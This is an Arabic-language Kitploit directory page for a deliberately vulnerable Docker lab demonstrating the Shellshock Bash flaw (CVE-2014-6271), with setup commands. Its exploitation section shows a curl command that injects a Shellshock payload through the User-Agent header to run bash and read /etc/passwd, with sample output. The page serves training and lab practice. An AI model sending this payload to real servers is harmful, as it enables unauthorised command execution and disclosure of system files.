Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
vaas-cve-2014-6271 — الثغرة الأمنية كخدمة: عرض لـ CVS-2014-6271، المعروفة أيضًا باسم Shellshock | Kitploit
أدوات/GitHubGitHub/hmlio/vaas-cve-2014-6271
أمن الحاوياتتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبالتعلم والتعليممختبرات وتدريب عملي
GitHubhmlio/vaas-cve-2014-6271

vaas-cve-2014-6271

الثغرة الأمنية كخدمة: عرض لـ CVS-2014-6271، المعروفة أيضًا باسم Shellshock

عرض المستودع
2271منذ 6 سنواتتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

الثغرة كخدمة - CVE 2014-6271

نظام لينكس دبيان (Buster) مع إصدار ضعيف من bash وتطبيق ويب لعرض CVS-2014-6271، المعروف أيضًا باسم Shellshock.

نظرة عامة

تعتمد حاوية docker هذه على دبيان Buster وتم تعديلها لاستخدام إصدار ضعيف من Bash (bash_4.2:2b:dfsg-0.1).

يتوفر تطبيق ويب عبر Apache 2 يقدّم سكربت CGI يشغّل أوامر shell.

الاستخدام

ثبّت الحاوية باستخدام docker pull hmlio/vaas-cve-2014-6271

شغّل الحاوية مع تعيين منفذ docker run -d -p 8080:80 hmlio/vaas-cve-2014-6271

يجب أن تتمكن من الوصول إلى تطبيق الويب على http://your-ip:8080/.

الاستغلال

يمكن استغلال تطبيق الويب/إصدار bash الضعيف كما هو موضح أدناه:

root@kitploit:~
# curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'cat /etc/passwd;'" http://your-ip:8080/cgi-bin/stats

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh

شكر وتقدير

استُلهمت الفكرة وتطبيق الويب بشكل كبير من الآلة الافتراضية «Sokar» على VulnHub، التي أنشأها rasta_mouse. لمزيد من التفاصيل يرجى زيارة https://www.vulnhub.com/entry/sokar-1,113/.

تنزيل الأداة